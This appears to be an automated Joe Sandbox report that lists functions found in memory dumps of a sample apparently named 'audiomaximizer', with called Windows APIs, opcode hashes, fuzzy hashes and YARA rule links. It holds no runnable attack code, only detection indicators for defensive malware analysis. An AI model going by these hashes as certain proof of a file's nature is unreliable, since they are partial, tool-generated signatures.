Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fee85f9cbaa2acfb895bd30f96a6865410db3807b3550c929bdb9b1f7a2db85b
Instruction ID: 0ad00ac4a645bafb62587d724c61bf03ca2cf46f2d4af300ae5c8e6c8a8e9041
Opcode Fuzzy Hash: fee85f9cbaa2acfb895bd30f96a6865410db3807b3550c929bdb9b1f7a2db85b
Instruction Fuzzy Hash: 242103B59003189FDB10CFAAD984ADEBFF4EB48310F10801AE958A7350D374A950CFA4

Function 05D07B9C Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,05D09058,040B42A8,031BF1F0), ref: 05D090E9

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 73f6f7d2940ef637686b238e508911b9c0139cec8565ea6abe25318ddd33a525
Instruction ID: 7e0d1c0ac63c213a7a98cfee945b45ae44c32abed99b6303efc14830ba6b874f
Opcode Fuzzy Hash: 73f6f7d2940ef637686b238e508911b9c0139cec8565ea6abe25318ddd33a525
Instruction Fuzzy Hash: 46213A719002098FDB10CF9AC844BEFFBF5EB48310F10842AE455A7391D774A945CFA5

Function 05D09070 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,05D09058,040B42A8,031BF1F0), ref: 05D090E9

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 9711267319ec60d63885caaa30aea1ceee0638f4f3cb74f16ca7d4b4aca2cffd
Instruction ID: 256031dc46fce14021a0bb59dbb3e14679ec651e092ddb8754e22a1bd83723cb
Opcode Fuzzy Hash: 9711267319ec60d63885caaa30aea1ceee0638f4f3cb74f16ca7d4b4aca2cffd
Instruction Fuzzy Hash: 762149B1D0024A8FDB14CF9AC884BEEFBF5FB88310F14842AD459A7291D774A985CF65

Function 05D09400 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 05D09485

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: ae959c4a30519dcee2da36e49f9c08f9fdf072f7ee8266d743c47335d092f66e
Instruction ID: 3ee2b8b8ec1c3baf9e1a32e155b83f99e0dbc852efed857972498226351d3d61
Opcode Fuzzy Hash: ae959c4a30519dcee2da36e49f9c08f9fdf072f7ee8266d743c47335d092f66e
Instruction Fuzzy Hash: 6B210FBAC00309DFCB10CF9AD984BDEFBB5FB48310F10842AE859A7241D379A544CBA4

Function 05D09408 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 05D09485

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 5c938c3b1ca6582694dba00a88c6c21fa858c78b49be4ddd9acc2b7c090a5fc5
Instruction ID: 3ece6df58b5d93c0ee724a2ac01921d950e258d05fb2f0f0bfda304d33e12ead
Opcode Fuzzy Hash: 5c938c3b1ca6582694dba00a88c6c21fa858c78b49be4ddd9acc2b7c090a5fc5
Instruction Fuzzy Hash: 7721E0B69013599FCB10CF9AD894BDEFBB5FB88310F10852EE819A7241C375A544CFA5

Function 07463C80 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07463CE5

Memory Dump Source

Source File: 00000008.00000002.4180867299.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7460000_audiomaximizer.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5b07b374c3c484da88f68bee78082513381905b4c86840bde72179aa25851668
Instruction ID: 51f4dafa1e0da975de81b0c023c68d7487a0acf84781756c23e745f9be321d03
Opcode Fuzzy Hash: 5b07b374c3c484da88f68bee78082513381905b4c86840bde72179aa25851668
Instruction Fuzzy Hash: DC1136B6800349DFDB10CF9AC545BDEBBF8FB48320F10845AE958A3641D379A584CFA5

Function 07463C88 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07463CE5

Memory Dump Source

Source File: 00000008.00000002.4180867299.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7460000_audiomaximizer.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8674d0dba8b1d2ab29311eba27ef0adde6ab5b51623780d64e3ba2c8db1361d3
Instruction ID: d0fa6bfb3c3317fdf598990108fb49268d39b44a0f01421e172b189eb42253d3
Opcode Fuzzy Hash: 8674d0dba8b1d2ab29311eba27ef0adde6ab5b51623780d64e3ba2c8db1361d3
Instruction Fuzzy Hash: 471106B6800349DFDB10CF9AC945BDEFBF8EB48320F10845AE558A3251D379A584CFA5

Function 05D09818 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 05D0987D

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b7e84efeb720c7609cfe74ccfdb5a7f0ffea88ada23b7eb505c5e14fa637acea
Instruction ID: 8083881f48c517397b68a01390271a14f62e5215edf6c491260cb2fcc8d3e276
Opcode Fuzzy Hash: b7e84efeb720c7609cfe74ccfdb5a7f0ffea88ada23b7eb505c5e14fa637acea
Instruction Fuzzy Hash: 2B1122B9800249DFCB10CF99D985BDEBBF8FB48320F20845AE518A7750C379A584CFA1

Function 05D081C0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05D0821D

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f93f1f69dfebf74776401f210b2f5cc9b6e817dfb78aff9363965e9619efd8dc
Instruction ID: 589153381091e24768c17dde9a366207781c53969f9080d18aea2db84c0668d9
Opcode Fuzzy Hash: f93f1f69dfebf74776401f210b2f5cc9b6e817dfb78aff9363965e9619efd8dc
Instruction Fuzzy Hash: 6D1112B59003598FCB20DFAAD549BCEBBF4EB48320F24845AE519A7350C379A544CFA5

Function 05D07B34 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05D0821D

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 76a9f626f392946217c98620cd685754bbc9ff4f24681825d7c0bf25bec884fb
Instruction ID: 16a4d545f1bd61cb027e1811dc83a242ae8ddb7c93f5d4b7b9fdba6b0119f40c
Opcode Fuzzy Hash: 76a9f626f392946217c98620cd685754bbc9ff4f24681825d7c0bf25bec884fb
Instruction Fuzzy Hash: A71103B59007488FCB20DF9AD588BDEBBF4EB48320F20845AD559A7350C375A944CFA5

Function 05D09820 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 05D0987D

Memory Dump Source

Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bc43d98c8985d2cb6a634966f7823827bf12dc9160d52d7a6ecd84329ca44b92
Instruction ID: b6394e84fddd2851b681757f17a495e72fdc13cc1ee46a2255e44303dc870489
Opcode Fuzzy Hash: bc43d98c8985d2cb6a634966f7823827bf12dc9160d52d7a6ecd84329ca44b92
Instruction Fuzzy Hash: D111FEB58003499FCB10DF9AC884BDEBBF8EB48320F10845AE959A7250C375A984CFA5

Function 0168AEF0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0168B079

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: a8d11ab3196559dc5c8bdaeb036ee12972abba806904a947a2fd9d0d8d8820b8
Instruction ID: 416000c61a7ec988bd572b0811d297ea18d9910befd33b3de2e56ede28ca9643
Opcode Fuzzy Hash: a8d11ab3196559dc5c8bdaeb036ee12972abba806904a947a2fd9d0d8d8820b8
Instruction Fuzzy Hash: 0B41E6317042449FCB15AFA9CC546AE7FF6BFC9610F1845AAE906DB395CE319C06CB90

Function 0168E007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2199105c806f2158f9df9714d9b0eb9fade2348dc54758ea77c401f9eda8ede0
Instruction ID: 97ad647495936fbe96eba98be70f0fb07cec64b3db4b497a1b885aa7ae707cc3
Opcode Fuzzy Hash: 2199105c806f2158f9df9714d9b0eb9fade2348dc54758ea77c401f9eda8ede0
Instruction Fuzzy Hash: 5D12A8350612538FD7602B74EEBC02EBE64FB0F323385BC81E55B854599B7264A8CF62

Function 0168E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5765e657e4b9eaac5f4b152926a618b6952ca6c4e6ee63fc76752c1a143204e
Instruction ID: 94bb18792ddad8ee175f03f0de30eb67c6103c27e01a7299529c03db7eaecc49
Opcode Fuzzy Hash: f5765e657e4b9eaac5f4b152926a618b6952ca6c4e6ee63fc76752c1a143204e
Instruction Fuzzy Hash: 2C12A8350612538F97602B74EEBC02EBE64FB0F323384BC80E15B854599B7274A8CF62

Function 016880D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b82017f10ea4b489d719f7fcb62c7c2be38b11eac67dc8736ba8add892d48191
Instruction ID: a309f7f13616ab8a3d59007c1d411da18e9948b9ead9513e1f56122931aa6c68
Opcode Fuzzy Hash: b82017f10ea4b489d719f7fcb62c7c2be38b11eac67dc8736ba8add892d48191
Instruction Fuzzy Hash: 1D714B347006068FDB25EF6CCCA4A6E7BEAAF49301B5581A9E915DB371DB70DC41CB90

Function 06EDA2D0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4176023569.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6ed0000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 216ec13d8f63724e0a29a3330bd357d7967855f36701b11328f889b6dee77752
Instruction ID: a03fae124583f68cc6dc28eac1c8ea2617abd889f17cdf45eb66f6139f890b52
Opcode Fuzzy Hash: 216ec13d8f63724e0a29a3330bd357d7967855f36701b11328f889b6dee77752
Instruction Fuzzy Hash: 1171B074E00208CFDB54DFA9D994ADEBBB2EF88300F249129D414BB364DB399982CF54

Function 0168F71F Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eab5aec29ccb9b47a41ea74f556fac87fa4f0dfe95aee119ed7dab18a600647
Instruction ID: a90743bb6170bf52918a1a73f6aa7f5eadc06b8f4166db86275bf95db94a2d1a
Opcode Fuzzy Hash: 3eab5aec29ccb9b47a41ea74f556fac87fa4f0dfe95aee119ed7dab18a600647
Instruction Fuzzy Hash: 42610134D01218DFDB14DFA5D984BAEBBB2FF88300F608569D809AB3A4DB355986CF40

Function 0168D548 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b417f8f16c46e66905df64916dff2f6fab91bce28fbcf62e4375650307cacd7
Instruction ID: 0e75ffbdf21b651c29f131f4a828db262fe64dbd75cb527cb20069fcdd6c946f
Opcode Fuzzy Hash: 6b417f8f16c46e66905df64916dff2f6fab91bce28fbcf62e4375650307cacd7
Instruction Fuzzy Hash: 15517474E012189FDB54DFA9D5849DDBBF2FF89310F24816AE819AB364DB309905CF50

Function 016841A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47a2d712d09c8d1299461f0c70cfbd6018495875be83358ea1da08bf9852def
Instruction ID: 7dae4f8377470f269d0177bea1425f62d03a44ddb5f360bdd93266861c3e9d58
Opcode Fuzzy Hash: e47a2d712d09c8d1299461f0c70cfbd6018495875be83358ea1da08bf9852def
Instruction Fuzzy Hash: 4A51A474E01209CFCB08DFA9D99499DBBB2FF89300B209169E815BB324DB35AD42CF55

Function 0168A303 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8cb23be4858db5e7a99caead34598cee582447100a3bdf36a07a948b47f4138
Instruction ID: 2d9121936e0f839a1a6c571732a899c44520dc6d52db31f2c0bd6ef7c58f45ae
Opcode Fuzzy Hash: b8cb23be4858db5e7a99caead34598cee582447100a3bdf36a07a948b47f4138
Instruction Fuzzy Hash: DB418C31A04249DFCF12DFE8CC44A9DBFB2AF49350F048656EA45AB3A2D370E915CB50

Function 06EDA2C1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4176023569.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6ed0000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d81fdaf94ed1cacad2fd93d23070b45778715d97fb01e8bb602687b04a1324ab
Instruction ID: 915767282f17a84df86dd652350a6b8ea4f01c3aa55db8bfef3716627eb4b53c
Opcode Fuzzy Hash: d81fdaf94ed1cacad2fd93d23070b45778715d97fb01e8bb602687b04a1324ab
Instruction Fuzzy Hash: 4D31C370E012088FDB58DFAAD9546DEBBF2AF89300F24E12AD418BB254DB355A42CF54

Function 01685658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b222b0a4f6f123793d6a8f0be78a3725902a4fe8c9d21546e80e865a910d7741
Instruction ID: b52e3de7def1b7835cf93083838ec687ec1490ab130dfa096ea7402d63752d78
Opcode Fuzzy Hash: b222b0a4f6f123793d6a8f0be78a3725902a4fe8c9d21546e80e865a910d7741
Instruction Fuzzy Hash: 71318E3120020ADFCF15AF69DC54AAF7BA6FB98201F408429FA1697354CB39DD61DFA1

Function 01688380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32217678553840f3740286a2cc4048384b9ea6ae4bd04649fae144d2a118aa8c
Instruction ID: 043304af523933e07775ca29ad8e118ab080e79c38c899f77d460f249e14269b
Opcode Fuzzy Hash: 32217678553840f3740286a2cc4048384b9ea6ae4bd04649fae144d2a118aa8c
Instruction Fuzzy Hash: D621AF323022054BEB257A2D8C5463E76ABAFC4748FA4813DD506CB79AEB65CC439781

Function 016862F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58578a9edf60c7f4c181238ec57518fa4d0ea118e93ec740e65edfe391070d7
Instruction ID: 256f6747c005cc82608d1d4cf43e456c9a1059cadfe40b51966b91b5dd02c132
Opcode Fuzzy Hash: e58578a9edf60c7f4c181238ec57518fa4d0ea118e93ec740e65edfe391070d7
Instruction Fuzzy Hash: 03212F353006218FD725AB29DC6492EB7A2FFC97457089279E906CB3A4CF35DC028F80

Function 016828F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2043800ffd649d94eb38002345c72d1a3c8ef180cdfcb2167a9cb50b74dffa5c
Instruction ID: e145304e2b3226f7af4e75370c6d9d2abc2b1dfd086fc900eb55e3541d2faeea
Opcode Fuzzy Hash: 2043800ffd649d94eb38002345c72d1a3c8ef180cdfcb2167a9cb50b74dffa5c
Instruction Fuzzy Hash: 51219075A001059FCF15EF28C8509EE77B5EB9D6A4B10C55ED84A9B340DB38EA43CBD2

Function 0144D2D0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4130674789.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_144d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54524dc078314c268712fa95a8d3c60b0d7bb99c7a373024cf8b5fe8da5f7ed7
Instruction ID: ba450afca442d17995d759db2dd781c81850b7dbf35033e04bdc47a286b8f768
Opcode Fuzzy Hash: 54524dc078314c268712fa95a8d3c60b0d7bb99c7a373024cf8b5fe8da5f7ed7
Instruction Fuzzy Hash: E7212971A04204DFEB05DF98D5C0B27BFA5FB94314F24C56ED9094B366C336D846CA61

Function 0144D118 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4130674789.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_144d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd5d9ada1de3f4c31835fa0d7b94dc28bd0866c88441e7656caf474fb7f412c
Instruction ID: 6ac73f41bfd78d68955034cb205940727f339b40184700ad79df3168a6f90ca7
Opcode Fuzzy Hash: 5bd5d9ada1de3f4c31835fa0d7b94dc28bd0866c88441e7656caf474fb7f412c
Instruction Fuzzy Hash: E7212671A04200DFEB05DF58D9C4B26BBA5FB94314F24C56EEC4A4B366C376D846CA61

Function 01685649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 381c67c619cb0d1c4b6efc1af44f6f0c6e5fdb3ef45b1de61e1a1c1d701a70ad
Instruction ID: 858540d45451cc114b8b9bc2007835cb7355dad5db3e8fa20234c7757a06ab1e
Opcode Fuzzy Hash: 381c67c619cb0d1c4b6efc1af44f6f0c6e5fdb3ef45b1de61e1a1c1d701a70ad
Instruction Fuzzy Hash: 22212631605249CFCB05BF68EC547AF3BA1FBA9211F008169F9069B365CB398D61CF91

Function 01689761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75012388e5178209f52f253d1f60e3ee921b182e4f14d297d7936b22fe67386d
Instruction ID: 42ecbb25853037d2dc0790608fa470ffd9a030f6a59dc78cbd8362777e3816ff
Opcode Fuzzy Hash: 75012388e5178209f52f253d1f60e3ee921b182e4f14d297d7936b22fe67386d
Instruction Fuzzy Hash: 60218570A012499FCB15DFA5D950AEEBFB6EF88309F248469E401A6290CB34A941CF60

Function 0168F640 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df63a46f4a8007fde855ecb02ad2f005ff1685e20c320c6859b762c73ba4874
Instruction ID: a7febece36ce08821236ad4eec3fef1696246ae685d9cdd37842f672fccbc0f9
Opcode Fuzzy Hash: 9df63a46f4a8007fde855ecb02ad2f005ff1685e20c320c6859b762c73ba4874
Instruction Fuzzy Hash: F72181B0D402099FDB44EFA9D980B9EBFF2FB44300F1092B9D554A7364EB745A458B81

Function 01686300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a74c6914725dee214719310fcb1198f6bdc45778ea6d93db50c88d5a63b0e14
Instruction ID: 459bee11d03492d6f5b4e8e53b0ce652dc1b863f5a4b44a1c0a8a64e29b471b5
Opcode Fuzzy Hash: 3a74c6914725dee214719310fcb1198f6bdc45778ea6d93db50c88d5a63b0e14
Instruction Fuzzy Hash: 5D1104353006119FD7296B2EDC6492EBBA6FFC97523085178EA06CB364CF31EC028B90

Function 016827F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5069fa13e085a1705de808d7cdce0cac74041023d3952b988f24671ca50beb22
Instruction ID: 8c0788885cf8cd07469a0a7f3662d61f8068dfc374a2f9a92b07379b7dc6fded
Opcode Fuzzy Hash: 5069fa13e085a1705de808d7cdce0cac74041023d3952b988f24671ca50beb22
Instruction Fuzzy Hash: 6521EFB4C1020A8FCB40EFA8D8445EEBFF0FF0A310F10516AD909B2214EB301A95CFA1

Function 0168F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb9a49a56674601ce05ba674653de3bc0c5cd63abf5fcb1b89068d2ccef1d61
Instruction ID: b06cb5d249f88cfe2bfb796bb2a42459987bf6432c1fcdc896e57b39ffd24328
Opcode Fuzzy Hash: adb9a49a56674601ce05ba674653de3bc0c5cd63abf5fcb1b89068d2ccef1d61
Instruction Fuzzy Hash: B2114C70D402099FDB44EFB9D980A9EBFF2FB44304F1096B9D518AB364EB385A45CB81

Function 0144D2CB Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4130674789.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_144d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: ad9efe1703342a22a680a780e980517727656a4d68c11b228d1936307971a549
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: C711BB75904280CFEB02CF54D5C4B16BFA2FB84318F24C6AAD8494B766C33AD80ACB61

Function 0144D113 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4130674789.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_144d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 955527e72c30c13d28097985b22d938a780cb90ca4f7e462f03a66a1d2a1aa1b
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 9F118B75904280DFEB06CF58D9C4B16BFA1FB94314F28C6AADC494B766C33AD44ACB61

Function 0168FE78 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172d627b08e80962336254262eab6e6abd6f967a82e05f53005a0bce7223635c
Instruction ID: 53c467ad54868da203c1a0e355eb496b7ae16f85a1b104797610a4ea35a3e92c
Opcode Fuzzy Hash: 172d627b08e80962336254262eab6e6abd6f967a82e05f53005a0bce7223635c
Instruction Fuzzy Hash: 261169713006419FC715DF7ED484855BBF6EF8A61431982AAE049CB732EB30EC4ADB91

Function 01685E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

